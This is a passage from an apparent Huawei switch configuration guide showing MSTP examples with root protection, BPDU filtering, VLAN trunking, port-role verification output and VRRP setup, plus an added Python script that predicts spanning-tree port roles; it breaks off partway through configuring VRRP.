[SwitchC-GigabitEthernet1/0/1] stp edged-port enable
[SwitchC-GigabitEthernet1/0/1] stp bpdu-filter enable
[SwitchC-GigabitEthernet1/0/1] quit

# Configure GE1/0/1 of SwitchD as an edge port and BPDU filter port.


[SwitchD] interface gigabitethernet 1/0/1
[SwitchD-GigabitEthernet1/0/1] stp edged-port enable
[SwitchD-GigabitEthernet1/0/1] stp bpdu-filter enable
[SwitchD-GigabitEthernet1/0/1] quit

Step 2 Enable protection functions. For example, enable root protection on the designated port of the
root bridge in each MSTI.
# Enable root protection on GE1/0/1 of SwitchA.
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] stp root-protection
[SwitchA-GigabitEthernet1/0/1] quit

# Enable root protection on GE1/0/1 of SwitchB.


[SwitchB] interface gigabitethernet 1/0/1
[SwitchB-GigabitEthernet1/0/1] stp root-protection
[SwitchB-GigabitEthernet1/0/1] quit

Step 3 Configure Layer 2 forwarding on switches of the ring network.


l Create VLANs 2 to 20 on SwitchA, SwitchB, SwitchC, and SwitchD.
# Create VLANs 2 to 20 on SwitchA.
[SwitchA] vlan batch 2 to 20

# Create VLANs 2 to 20 on SwitchB.


[SwitchB] vlan batch 2 to 20

# Create VLANs 2 to 20 on SwitchC.


[SwitchC] vlan batch 2 to 20

# Create VLANs 2 to 20 on SwitchD.


[SwitchD] vlan batch 2 to 20

l Add ports connected to the ring to VLANs.


# Add GE1/0/1 on SwitchA to VLANs.
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] port link-type trunk
[SwitchA-GigabitEthernet1/0/1] port trunk allow-pass vlan 2 to 20
[SwitchA-GigabitEthernet1/0/1] quit

# Add Eth-Trunk1 on SwitchA to VLANs.


[SwitchA] interface Eth-Trunk 1
[SwitchA-Eth-Trunk1] trunkport gigabitethernet 1/0/2
[SwitchA-Eth-Trunk1] trunkport gigabitethernet 1/0/3
[SwitchA-Eth-Trunk1] port link-type trunk
[SwitchA-Eth-Trunk1] port trunk allow-pass vlan 2 to 20
[SwitchA-Eth-Trunk1] quit

# Add GE1/0/1 on SwitchB to VLANs.


[SwitchB] interface gigabitethernet 1/0/1
[SwitchB-GigabitEthernet1/0/1] port link-type trunk
[SwitchB-GigabitEthernet1/0/1] port trunk allow-pass vlan 2 to 20
[SwitchB-GigabitEthernet1/0/1] quit

# Add Eth-Trunk1 on SwitchB to VLANs.


[SwitchB] interface Eth-Trunk 1
[SwitchB-Eth-Trunk1] trunkport gigabitethernet 1/0/2
[SwitchB-Eth-Trunk1] trunkport gigabitethernet 1/0/3
[SwitchB-Eth-Trunk1] port link-type trunk
[SwitchB-Eth-Trunk1] port trunk allow-pass vlan 2 to 20
[SwitchB-Eth-Trunk1] quit

# Add GE1/0/1 on SwitchC to VLANs.


[SwitchC] interface gigabitethernet 1/0/1
[SwitchC-GigabitEthernet1/0/1] port link-type access
[SwitchC-GigabitEthernet1/0/1] port default vlan 2
[SwitchC-GigabitEthernet1/0/1] quit

# Add GE1/0/2 on SwitchC to VLANs.


[SwitchC] interface gigabitethernet 1/0/2
[SwitchC-GigabitEthernet1/0/2] port link-type trunk
[SwitchC-GigabitEthernet1/0/2] port trunk allow-pass vlan 2 to 20
[SwitchC-GigabitEthernet1/0/2] quit

# Add GE1/0/3 on SwitchC to VLANs.


[SwitchC] interface gigabitethernet 1/0/3
[SwitchC-GigabitEthernet1/0/3] port link-type trunk
[SwitchC-GigabitEthernet1/0/3] port trunk allow-pass vlan 2 to 20
[SwitchC-GigabitEthernet1/0/3] quit

# Add GE1/0/1 on SwitchD to VLANs.


[SwitchD] interface gigabitethernet 1/0/1
[SwitchD-GigabitEthernet1/0/1] port link-type access
[SwitchD-GigabitEthernet1/0/1] port default vlan 11
[SwitchD-GigabitEthernet1/0/1] quit

# Add GE1/0/2 on SwitchD to VLANs.


[SwitchD] interface gigabitethernet 1/0/2
[SwitchD-GigabitEthernet1/0/2] port link-type trunk
[SwitchD-GigabitEthernet1/0/2] port trunk allow-pass vlan 2 to 20
[SwitchD-GigabitEthernet1/0/2] quit

# Add GE1/0/3 on SwitchD to VLANs.


[SwitchD] interface gigabitethernet 1/0/3
[SwitchD-GigabitEthernet1/0/3] port link-type trunk
[SwitchD-GigabitEthernet1/0/3] port trunk allow-pass vlan 2 to 20
[SwitchD-GigabitEthernet1/0/3] quit

Step 4 Verify the configuration.


After the configuration is complete and the network topology becomes stable, perform the
following operations to verify the configuration.

NOTE

MSTI 1 and MSTI 2 are used as examples, so you do not need to check the port status in MSTI 0.

# Run the display stp brief command on SwitchA to view the port status and protection type.
The displayed information is as follows:
[SwitchA] display stp brief
MSTID Port Role STP State Protection
0 GigabitEthernet1/0/1 DESI FORWARDING ROOT
0 Eth-Trunk1 DESI FORWARDING NONE
1 GigabitEthernet1/0/1 DESI FORWARDING ROOT
1 Eth-Trunk1 DESI FORWARDING NONE
2 GigabitEthernet1/0/1 DESI FORWARDING ROOT
2 Eth-Trunk1 ROOT FORWARDING NONE

In MSTI 1, Eth-Trunk1 and GE1/0/1 on SwitchA are designated ports because SwitchA is the
root bridge. In MSTI 2, GE1/0/1 on SwitchA is the designated port and Eth-Trunk1 is the root
port.
# Run the display stp brief command on SwitchB. The following information is displayed:
[SwitchB] display stp brief
MSTID Port Role STP State Protection
0 GigabitEthernet1/0/1 DESI FORWARDING ROOT
0 Eth-Trunk1 ROOT FORWARDING NONE
1 GigabitEthernet1/0/1 DESI FORWARDING ROOT
1 Eth-Trunk1 ROOT FORWARDING NONE
2 GigabitEthernet1/0/1 DESI FORWARDING ROOT
2 Eth-Trunk1 DESI FORWARDING NONE

In MSTI 2, GE1/0/1 and Eth-Trunk1 on SwitchB are designated ports because SwitchB is the
root bridge. In MSTI 1, GE1/0/1 on SwitchB is the designated port and Eth-Trunk1 is the root
port.
# Run the display stp interface brief command on SwitchC. The following information is
displayed:
[SwitchC] display stp interface gigabitethernet 1/0/3 brief
MSTID Port Role STP State Protection
0 GigabitEthernet1/0/3 ROOT FORWARDING NONE
1 GigabitEthernet1/0/3 ROOT FORWARDING NONE
2 GigabitEthernet1/0/3 ROOT FORWARDING NONE
[SwitchC] display stp interface gigabitethernet 1/0/2 brief
MSTID Port Role STP State Protection
0 GigabitEthernet1/0/2 DESI FORWARDING NONE
1 GigabitEthernet1/0/2 DESI FORWARDING NONE
2 GigabitEthernet1/0/2 ALTE DISCARDING NONE

GE1/0/3 on SwitchC is the root port in MSTI 1 and MSTI 2. GE1/0/2 on SwitchC is blocked
in MSTI 2 and is the designated port in MSTI 1.
# Run the display stp interface brief command on SwitchD. The following information is
displayed:
[SwitchD] display stp interface gigabitethernet 1/0/3 brief
MSTID Port Role STP State Protection
0 GigabitEthernet1/0/3 ROOT FORWARDING NONE
1 GigabitEthernet1/0/3 ROOT FORWARDING NONE
2 GigabitEthernet1/0/3 ROOT FORWARDING NONE
[SwitchD] display stp interface gigabitethernet 1/0/2 brief
MSTID Port Role STP State Protection
0 GigabitEthernet1/0/2 ALTE DISCARDING NONE
1 GigabitEthernet1/0/2 ALTE DISCARDING NONE
2 GigabitEthernet1/0/2 DESI FORWARDING NONE

GE1/0/3 on SwitchD is the root port in MSTI 1 and MSTI 2. GE1/0/2 on SwitchD is blocked
in MSTI 1 and is the designated port in MSTI 2.
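The port roles shown above, and those in Step 3 of section 7.2, follow from the priority-vector comparison that spanning tree bridges make (root path cost, then designated bridge ID, then port ID), so they can be predicted before any switch is touched. The following Python script is added here as an illustration and is not Huawei code: it computes the roles for the topologies of Figures 7-2 and 7-3 and also models the case described in the roadmap NOTE of this section, where Eth-Trunk1 between the root bridge and the secondary root bridge goes down, the root-protected GE1/0/1 of SwitchB then receives a superior BPDU from SwitchD and is held in Discarding, and SwitchB is cut off instead of re-rooting through SwitchD. Assumptions: bridge IDs are (priority, name) with the switch name standing in for the MAC address tie-break, the legacy cost of 20 for every 1 Gbit/s port and for Eth-Trunk1, port names compared as strings in place of numeric port IDs, and the cabling as read from the figures.

```python
"""Spanning-tree port-role calculator (added example, not Huawei code).

Reproduces the priority-vector comparison that STP/RSTP/MSTP bridges make
(root path cost, designated bridge ID, designated port ID, receiving port)
so the roles reported by 'display stp brief' can be predicted offline.
Assumptions: bridge ID = (priority, name), the name standing in for the MAC
tie-break; 1 Gbit/s ports cost 20 (Huawei legacy algorithm) unless overridden;
port names are compared as strings in place of numeric port IDs.
"""
import heapq
from collections import defaultdict


def port_roles(priorities, links, root_protected=frozenset()):
    """Return {(bridge, port): (role, state, protection)} for one instance.
    priorities: {bridge: priority}; links: [((bridge, port, cost), (bridge, port, cost))];
    root_protected: ports configured with 'stp root-protection'."""
    bid = lambda b: (priorities[b], b)
    prot = lambda port: "ROOT" if port in root_protected else "NONE"
    cut = set()  # root-protected ports that received a superior BPDU
    while True:
        # bridge -> [(own port, peer bridge, peer port, peer's port cost)]
        adj = defaultdict(list)
        for (a, pa, ca), (b, pb, cb) in links:
            if (a, pa) not in cut and (b, pb) not in cut:
                adj[a].append((pa, b, pb, cb))
                adj[b].append((pb, a, pa, ca))
        # Dijkstra over priority vectors from the best bridge of each component (its root).
        best, root_port = {}, {}
        for start in sorted(priorities, key=bid):
            if start in best:
                continue
            heap = [((0, bid(start), "", ""), start, None)]
            while heap:
                vec, x, via = heapq.heappop(heap)
                if x in best:
                    continue
                best[x], root_port[x] = vec, via
                for p, n, q, cq in adj[x]:
                    if n not in best:  # receiver n adds its own port cost cq
                        heapq.heappush(heap, ((vec[0] + cq, bid(x), p, q), n, (n, q)))
        roles = {}
        for (a, pa, _), (b, pb, _) in links:
            for me, peer in (((a, pa), (b, pb)), ((b, pb), (a, pa))):
                if me in cut:      # root protection holds the port in Discarding
                    roles[me] = ("DESI", "DISCARDING", "ROOT")
                elif peer in cut:  # only inferior BPDUs arrive from a held port
                    roles[me] = ("DESI", "FORWARDING", prot(me))
                else:
                    mine = (best[me[0]][0], bid(me[0]), me[1])
                    theirs = (best[peer[0]][0], bid(peer[0]), peer[1])
                    if mine < theirs:
                        roles[me] = ("DESI", "FORWARDING", prot(me))
                    elif root_port[me[0]] == me:
                        roles[me] = ("ROOT", "FORWARDING", prot(me))
                    else:
                        roles[me] = ("ALTE", "DISCARDING", prot(me))
        # A protected port that would become root/alternate heard a superior BPDU:
        # root protection discards on it instead, so cut it and recompute.
        tripped = {p for p in root_protected if p in roles and p not in cut and roles[p][0] != "DESI"}
        if not tripped:
            return roles
        cut |= tripped


# Section 7.2 topology (Figure 7-2); cabling is assumed where the figure is unclear.
RSTP_PRIORITIES = {"SwitchA": 0, "SwitchD": 4096, "SwitchB": 32768, "SwitchC": 32768}
RSTP_LINKS = [
    (("SwitchA", "GE1/0/1", 20), ("SwitchD", "GE1/0/1", 20)),
    (("SwitchA", "GE1/0/2", 20), ("SwitchB", "GE1/0/3", 20)),
    (("SwitchB", "GE1/0/1", 20), ("SwitchC", "GE1/0/1", 20000)),  # stp cost 20000
    (("SwitchC", "GE1/0/3", 20), ("SwitchD", "GE1/0/2", 20)),
]


def rstp_roles():
    """Section 7.2: SwitchA root, SwitchD secondary, root protection on SwitchA."""
    return port_roles(RSTP_PRIORITIES, RSTP_LINKS,
                      {("SwitchA", "GE1/0/1"), ("SwitchA", "GE1/0/2")})


def mstp_roles(msti, trunk_up=True):
    """Section 7.3 (Figure 7-3), MSTI 1 or 2; trunk_up=False models the
    Eth-Trunk1 failure described in the roadmap NOTE."""
    prio = {"SwitchA": 0, "SwitchB": 4096} if msti == 1 else {"SwitchA": 4096, "SwitchB": 0}
    prio.update({"SwitchC": 32768, "SwitchD": 32768})
    c_cost, d_cost = (20, 20000) if msti == 1 else (20000, 20)  # stp instance N cost 20000
    links = [
        (("SwitchA", "GE1/0/1", 20), ("SwitchC", "GE1/0/3", 20)),
        (("SwitchB", "GE1/0/1", 20), ("SwitchD", "GE1/0/3", 20)),
        (("SwitchC", "GE1/0/2", c_cost), ("SwitchD", "GE1/0/2", d_cost)),
    ]
    if trunk_up:
        links.append((("SwitchA", "Eth-Trunk1", 20), ("SwitchB", "Eth-Trunk1", 20)))
    return port_roles(prio, links, {("SwitchA", "GE1/0/1"), ("SwitchB", "GE1/0/1")})


if __name__ == "__main__":
    for label, roles in (("RSTP", rstp_roles()), ("MSTI 1", mstp_roles(1)),
                         ("MSTI 2", mstp_roles(2)), ("Eth-Trunk1 down", mstp_roles(1, False))):
        for (br, port), (role, state, p) in sorted(roles.items()):
            print(f"{label:16} {br:8} {port:10} {role:4} {state:10} {p}")
```

Running the script prints one line per port and scenario in the same columns as display stp brief. A root-protected port reported as DESI DISCARDING ROOT is the signature of root protection having tripped: the port refused a superior BPDU, which is the intended defence against a switch that claims the root role through a designated port, but with the root link down it also isolates SwitchB, which is exactly why the NOTE recommends binding that link to an Eth-Trunk.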

----End

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 2 to 20
#
stp instance 1 root primary
stp instance 2 root secondary
stp pathcost-standard legacy
#
stp region-configuration
region-name RG1
instance 1 vlan 2 to 10
instance 2 vlan 11 to 20
active region-configuration

#
interface Eth-Trunk1
port link-type trunk
port trunk allow-pass vlan 2 to 20
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 2 to 20
stp root-protection
#
interface GigabitEthernet1/0/2
eth-trunk 1
#
interface GigabitEthernet1/0/3
eth-trunk 1
#
return
l Configuration file of SwitchB
#
sysname SwitchB
#
vlan batch 2 to 20
#
stp instance 1 root secondary
stp instance 2 root primary
stp pathcost-standard legacy
#
stp region-configuration
region-name RG1
instance 1 vlan 2 to 10
instance 2 vlan 11 to 20
active region-configuration
#
interface Eth-Trunk1
port link-type trunk
port trunk allow-pass vlan 2 to 20
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 2 to 20
stp root-protection
#
interface GigabitEthernet1/0/2
eth-trunk 1
#
interface GigabitEthernet1/0/3
eth-trunk 1
#
return
l Configuration file of SwitchC
#
sysname SwitchC
#
vlan batch 2 to 20
#
stp pathcost-standard legacy
#
stp region-configuration
region-name RG1
instance 1 vlan 2 to 10
instance 2 vlan 11 to 20
active region-configuration
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 2
stp bpdu-filter enable
stp edged-port enable
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 2 to 20
stp instance 2 cost 20000
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 2 to 20
#
return

l Configuration file of SwitchD


#
sysname SwitchD
#
vlan batch 2 to 20
#
stp pathcost-standard legacy
#
stp region-configuration
region-name RG1
instance 1 vlan 2 to 10
instance 2 vlan 11 to 20
active region-configuration
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 11
stp bpdu-filter enable
stp edged-port enable
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 2 to 20
stp instance 1 cost 20000
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 2 to 20
#
return

Related Content
Videos

Configuring MSTP to Prevent Loops

7.4 Example for Configuring MSTP and VRRP


MSTP and VRRP
When VRRP is deployed on a network, multiple devices transmit services simultaneously.
Each virtual device consists of one master and several backups. If redundant links need to be
deployed for access backup, MSTP needs to be deployed to eliminate loops and ensure load
balancing of traffic.

Configuration Notes
l The following describes the applicable product models and versions.

Table 7-4 Applicable product models and versions

Product | Product Model | Software Version
S12700 | S12708 and S12712 | V200R005C00, V200R006C00, V200R007C00, V200R007C20, V200R008C00, V200R009C00
S12700 | S12704 | V200R008C00, V200R009C00

l The ports connected to terminals do not participate in MSTP calculation, so you are
advised to configure the ports as edge ports or disable STP on the ports.

Networking Requirements
As shown in Figure 7-4, hosts connect to the network through SwitchC. SwitchC is dual-homed
to SwitchA and SwitchB, which connect to the Internet. Redundant links are deployed for
access backup. The use of redundant links, however, may produce loops, causing broadcast
storms and rendering the MAC address table unstable.
It is required that network loops be prevented when redundant links are deployed, traffic be
switched to another link when one link is disconnected, and network bandwidth be effectively
used.
MSTP can be configured on the network. MSTP blocks redundant links and prunes a network
into a tree topology free from loops. VRRP can be configured on SwitchA and SwitchB.
HostA connects to the Internet with SwitchA as the default gateway and SwitchB as the
backup gateway; HostB connects to the Internet with SwitchB as the default gateway and
SwitchA as the backup gateway. This setting implements reliability and traffic load balancing.

Figure 7-4 Networking for configuring MSTP and VRRP

[Figure: HostA (VLAN 2, 10.1.2.101/24) and HostB (VLAN 3, 10.1.3.101/24) connect to SwitchC. SwitchC is dual-homed to SwitchA and SwitchB, which run MSTP and reach the Internet through RouterA and RouterB. VRRP VRID 1 (virtual IP address 10.1.2.100): SwitchA is the master and SwitchB the backup. VRRP VRID 2 (virtual IP address 10.1.3.100): SwitchB is the master and SwitchA the backup. VLAN 2 maps to MSTI 1 (root switch: SwitchA); VLAN 3 maps to MSTI 2 (root switch: SwitchB). Each MSTI has one blocked port.]

Device | Interface | VLANIF Interface | IP Address
SwitchA | GE1/0/1 and GE1/0/2 | VLANIF 2 | 10.1.2.102/24
SwitchA | GE1/0/1 and GE1/0/2 | VLANIF 3 | 10.1.3.102/24
SwitchA | GE1/0/3 | VLANIF 4 | 10.1.4.102/24
SwitchB | GE1/0/1 and GE1/0/2 | VLANIF 2 | 10.1.2.103/24
SwitchB | GE1/0/1 and GE1/0/2 | VLANIF 3 | 10.1.3.103/24
SwitchB | GE1/0/3 | VLANIF 5 | 10.1.5.103/24

Configuration Roadmap
The configuration roadmap is as follows:

1. Configure basic MSTP functions on switching devices of the ring network.

a. Configure an MST region and create multi-instance, and map VLAN 2 to MSTI 1
and VLAN 3 to MSTI 2 to load balance traffic.
b. Configure the root bridge and secondary root bridge in each MST region.
c. Configure the path cost of a port in each MSTI so that the port can be blocked.
d. Enable MSTP to prevent loops.
n Enable MSTP globally.
n Enable MSTP on all ports except the ports connected to hosts.
2. Enable protection functions to protect devices or links. For example, enable root
protection on the designed port of the root bridge in each MSTI.
3. Configure Layer 2 forwarding on devices.
4. Assign an IP address to each interface and configure a routing protocol to ensure
network connectivity.
NOTE
In this example, SwitchA and SwitchB need to support VRPP and OSPF. For details about the
models supporting VRRP and OSPF, see the documentation.
5. Create VRRP groups 1 and 2 on SwitchA and SwitchB. In VRRP group 1, configure
SwitchA as the master and SwitchB as the backup. In VRRP group 2, configure SwitchB
as the master and SwitchA as the backup.

Procedure
Step 1 Configure basic MSTP functions.
1. Configure SwitchA, SwitchB, and SwitchC in the MST region RG1 and create MSTI 1
and MSTI 2.
# Configure an MST region on SwitchA.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] stp region-configuration //Enter the MST region view.
[SwitchA-mst-region] region-name RG1 //Configure the region name as RG1.
[SwitchA-mst-region] instance 1 vlan 2 //Map VLAN 2 to MSTI 1.
[SwitchA-mst-region] instance 2 vlan 3 //Map VLAN 3 to MSTI 2.
[SwitchA-mst-region] active region-configuration //Activate the MST region configuration.
[SwitchA-mst-region] quit

# Configure an MST region on SwitchB.
<HUAWEI> system-view
[HUAWEI] sysname SwitchB
[SwitchB] stp region-configuration //Enter the MST region view.
[SwitchB-mst-region] region-name RG1 //Configure the region name as RG1.
[SwitchB-mst-region] instance 1 vlan 2 //Map VLAN 2 to MSTI 1.
[SwitchB-mst-region] instance 2 vlan 3 //Map VLAN 3 to MSTI 2.
[SwitchB-mst-region] active region-configuration //Activate the MST region configuration.
[SwitchB-mst-region] quit

# Configure an MST region on SwitchC.
<HUAWEI> system-view
[HUAWEI] sysname SwitchC
[SwitchC] stp region-configuration //Enter the MST region view.
[SwitchC-mst-region] region-name RG1 //Configure the region name as RG1.
[SwitchC-mst-region] instance 1 vlan 2 //Map VLAN 2 to MSTI 1.
[SwitchC-mst-region] instance 2 vlan 3 //Map VLAN 3 to MSTI 2.
[SwitchC-mst-region] active region-configuration //Activate the MST region configuration.
[SwitchC-mst-region] quit

2. Configure root bridges and secondary root bridges of MSTI 1 and MSTI 2 in the MST
region RG1.
– Configure the root bridge and secondary root bridge in MSTI 1.
# Configure SwitchA as the root bridge in MSTI 1.
[SwitchA] stp instance 1 root primary

# Configure SwitchB as the secondary root bridge in MSTI 1.
[SwitchB] stp instance 1 root secondary

– Configure the root bridge and secondary root bridge in MSTI 2.
# Configure SwitchB as the root bridge in MSTI 2.
[SwitchB] stp instance 2 root primary

# Configure SwitchA as the secondary root bridge in MSTI 2.
[SwitchA] stp instance 2 root secondary

3. Set the path costs of the ports to be blocked in MSTI 1 and MSTI 2 to be larger than the
default values.
NOTE

– The path cost range depends on the algorithm. The Huawei proprietary algorithm is used as an
example. Set the path costs of the ports to be blocked in MSTI 1 and MSTI 2 to 20000.
– Switching devices on the same network must use the same algorithm to calculate the path cost
of ports.
# Configure SwitchA to use the Huawei proprietary algorithm to calculate the path cost.
[SwitchA] stp pathcost-standard legacy

# Configure SwitchB to use the Huawei proprietary algorithm to calculate the path cost.
[SwitchB] stp pathcost-standard legacy

# Configure SwitchC to use the Huawei proprietary algorithm to calculate the path cost, and
set the path cost of GE1/0/1 in MSTI 2 to 20000 and the path cost of GE1/0/4 in MSTI 1 to
20000.
[SwitchC] stp pathcost-standard legacy
[SwitchC] interface gigabitethernet 1/0/1
[SwitchC-GigabitEthernet1/0/1] stp instance 2 cost 20000
[SwitchC-GigabitEthernet1/0/1] quit
[SwitchC] interface gigabitethernet 1/0/4
[SwitchC-GigabitEthernet1/0/4] stp instance 1 cost 20000
[SwitchC-GigabitEthernet1/0/4] quit

4. Enable MSTP to eliminate loops.
– Enable MSTP globally on devices.
# Enable MSTP on SwitchA.
[SwitchA] stp enable

# Enable MSTP on SwitchB.
[SwitchB] stp enable

# Enable MSTP on SwitchC.
[SwitchC] stp enable

– Configure the ports connected to hosts as edge ports and configure BPDU filtering.
[SwitchC] interface gigabitethernet 1/0/2
[SwitchC-GigabitEthernet1/0/2] stp disable
[SwitchC-GigabitEthernet1/0/2] stp edged-port enable
[SwitchC-GigabitEthernet1/0/2] stp bpdu-filter enable
[SwitchC-GigabitEthernet1/0/2] quit
[SwitchC] interface gigabitethernet 1/0/3
[SwitchC-GigabitEthernet1/0/3] stp edged-port enable
[SwitchC-GigabitEthernet1/0/3] stp bpdu-filter enable
[SwitchC-GigabitEthernet1/0/3] quit

– Configure the ports connected to the routers as edge ports and configure BPDU
filtering.
# Configure SwitchA.
[SwitchA] interface gigabitethernet 1/0/3
[SwitchA-GigabitEthernet1/0/3] stp edged-port enable
[SwitchA-GigabitEthernet1/0/3] stp bpdu-filter enable
[SwitchA-GigabitEthernet1/0/3] quit

# Configure SwitchB.
[SwitchB] interface gigabitethernet 1/0/3
[SwitchB-GigabitEthernet1/0/3] stp edged-port enable
[SwitchB-GigabitEthernet1/0/3] stp bpdu-filter enable
[SwitchB-GigabitEthernet1/0/3] quit

Step 2 Enable protection functions. For example, enable root protection on the designated port of the
root bridge in each MSTI.
# Enable root protection on GE1/0/1 of SwitchA.
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] stp root-protection
[SwitchA-GigabitEthernet1/0/1] quit

# Enable root protection on GE1/0/1 of SwitchB.
[SwitchB] interface gigabitethernet 1/0/1
[SwitchB-GigabitEthernet1/0/1] stp root-protection
[SwitchB-GigabitEthernet1/0/1] quit

Step 3 Configure Layer 2 forwarding on switches of the ring network.
l Create VLAN 2 and VLAN 3 on SwitchA, SwitchB, and SwitchC.
# Create VLAN 2 and VLAN 3 on SwitchA.
[SwitchA] vlan batch 2 to 3

# Create VLAN 2 and VLAN 3 on SwitchB.
[SwitchB] vlan batch 2 to 3

# Create VLAN 2 and VLAN 3 on SwitchC.
[SwitchC] vlan batch 2 to 3

l Add ports connected to the ring to VLANs.
# Add GE1/0/1 on SwitchA to VLANs.
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] port link-type trunk
[SwitchA-GigabitEthernet1/0/1] port trunk allow-pass vlan 2 to 3
[SwitchA-GigabitEthernet1/0/1] quit

# Add GE1/0/2 on SwitchA to VLANs.
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] port link-type trunk
[SwitchA-GigabitEthernet1/0/2] port trunk allow-pass vlan 2 to 3
[SwitchA-GigabitEthernet1/0/2] quit

# Add GE1/0/1 on SwitchB to VLANs.
[SwitchB] interface gigabitethernet 1/0/1
[SwitchB-GigabitEthernet1/0/1] port link-type trunk
[SwitchB-GigabitEthernet1/0/1] port trunk allow-pass vlan 2 to 3
[SwitchB-GigabitEthernet1/0/1] quit

# Add GE1/0/2 on SwitchB to VLANs.
[SwitchB] interface gigabitethernet 1/0/2
[SwitchB-GigabitEthernet1/0/2] port link-type trunk
[SwitchB-GigabitEthernet1/0/2] port trunk allow-pass vlan 2 to 3
[SwitchB-GigabitEthernet1/0/2] quit

# Add GE1/0/1 on SwitchC to VLANs.
[SwitchC] interface gigabitethernet 1/0/1
[SwitchC-GigabitEthernet1/0/1] port link-type trunk
[SwitchC-GigabitEthernet1/0/1] port trunk allow-pass vlan 2 to 3
[SwitchC-GigabitEthernet1/0/1] quit

# Add GE1/0/2 on SwitchC to VLANs.
[SwitchC] interface gigabitethernet 1/0/2
[SwitchC-GigabitEthernet1/0/2] port link-type access
[SwitchC-GigabitEthernet1/0/2] port default vlan 2
[SwitchC-GigabitEthernet1/0/2] quit

# Add GE1/0/3 on SwitchC to VLANs.
[SwitchC] interface gigabitethernet 1/0/3
[SwitchC-GigabitEthernet1/0/3] port link-type access
[SwitchC-GigabitEthernet1/0/3] port default vlan 3
[SwitchC-GigabitEthernet1/0/3] quit

# Add GE1/0/4 on SwitchC to VLANs.
[SwitchC] interface gigabitethernet 1/0/4
[SwitchC-GigabitEthernet1/0/4] port link-type trunk
[SwitchC-GigabitEthernet1/0/4] port trunk allow-pass vlan 2 to 3
[SwitchC-GigabitEthernet1/0/4] quit

Step 4 Verify the configuration.
After the configuration is complete and the network topology becomes stable, perform the
following operations to verify the configuration.

NOTE

MSTI 1 and MSTI 2 are used as examples, so you do not need to check the port status in MSTI 0.

# Run the display stp brief command on SwitchA to view the port status and protection type.
The displayed information is as follows:
[SwitchA] display stp brief
MSTID Port Role STP State Protection
0 GigabitEthernet1/0/1 DESI FORWARDING ROOT
0 GigabitEthernet1/0/2 DESI FORWARDING NONE
1 GigabitEthernet1/0/1 DESI FORWARDING ROOT
1 GigabitEthernet1/0/2 DESI FORWARDING NONE
2 GigabitEthernet1/0/1 DESI FORWARDING ROOT
2 GigabitEthernet1/0/2 ROOT FORWARDING NONE

In MSTI 1, GE1/0/2 and GE1/0/1 on SwitchA are designated ports because SwitchA is the root
bridge. In MSTI 2, GE1/0/1 on SwitchA is the designated port and GE1/0/2 is the root port.
# Run the display stp brief command on SwitchB. The displayed information is as follows:
[SwitchB] display stp brief
MSTID Port Role STP State Protection
0 GigabitEthernet1/0/1 DESI FORWARDING ROOT
0 GigabitEthernet1/0/2 ROOT FORWARDING NONE
1 GigabitEthernet1/0/1 DESI FORWARDING ROOT
1 GigabitEthernet1/0/2 ROOT FORWARDING NONE
2 GigabitEthernet1/0/1 DESI FORWARDING ROOT
2 GigabitEthernet1/0/2 DESI FORWARDING NONE

In MSTI 2, GE1/0/1 and GE1/0/2 on SwitchB are designated ports because SwitchB is the root
bridge. In MSTI 1, GE1/0/1 on SwitchB is the designated port and GE1/0/2 is the root port.
# Run the display stp interface brief command on SwitchC. The displayed information is as
follows:
[SwitchC] display stp interface gigabitethernet 1/0/1 brief
MSTID Port Role STP State Protection
0 GigabitEthernet1/0/1 ROOT FORWARDING NONE
1 GigabitEthernet1/0/1 ROOT FORWARDING NONE
2 GigabitEthernet1/0/1 ALTE DISCARDING NONE
[SwitchC] display stp interface gigabitethernet 1/0/4 brief
MSTID Port Role STP State Protection
0 GigabitEthernet1/0/4 ALTE DISCARDING NONE
1 GigabitEthernet1/0/4 ALTE DISCARDING NONE
2 GigabitEthernet1/0/4 ROOT FORWARDING NONE

GE1/0/1 on SwitchC is the root port in MSTI 1 and is blocked in MSTI 2. GE1/0/4 on
SwitchC is blocked in MSTI 1 and is the designated port in MSTI 2.
Step 5 Configure devices to ensure network connectivity.
# Assign an IP address to each interface. SwitchA is used as an example. The configuration of
SwitchB is similar to that of SwitchA, and is not mentioned here. For details, see the
configuration files.
[SwitchA] vlan batch 4
[SwitchA] interface gigabitethernet 1/0/3
[SwitchA-GigabitEthernet1/0/3] port link-type trunk
[SwitchA-GigabitEthernet1/0/3] port trunk allow-pass vlan 4
[SwitchA-GigabitEthernet1/0/3] quit
[SwitchA] interface vlanif 2
[SwitchA-Vlanif2] ip address 10.1.2.102 24
[SwitchA-Vlanif2] quit
[SwitchA] interface vlanif 3
[SwitchA-Vlanif3] ip address 10.1.3.102 24
[SwitchA-Vlanif3] quit
[SwitchA] interface vlanif 4
[SwitchA-Vlanif4] ip address 10.1.4.102 24
[SwitchA-Vlanif4] quit

# Configure OSPF between SwitchA, SwitchB, and the routers. SwitchA is used as an example.
The configuration of SwitchB is similar to that of SwitchA, and is not mentioned here. For
details, see the configuration files.
[SwitchA] ospf 1
[SwitchA-ospf-1] area 0
[SwitchA-ospf-1-area-0.0.0.0] network 10.1.2.0 0.0.0.255
[SwitchA-ospf-1-area-0.0.0.0] network 10.1.3.0 0.0.0.255
[SwitchA-ospf-1-area-0.0.0.0] network 10.1.4.0 0.0.0.255
[SwitchA-ospf-1-area-0.0.0.0] quit
[SwitchA-ospf-1] quit

Step 6 Configure VRRP groups.
# Configure VRRP group 1 on SwitchA and SwitchB, set the priority of SwitchA to 120 and
the preemption delay to 20s, and set the default priority for SwitchB.
[SwitchA] interface vlanif 2
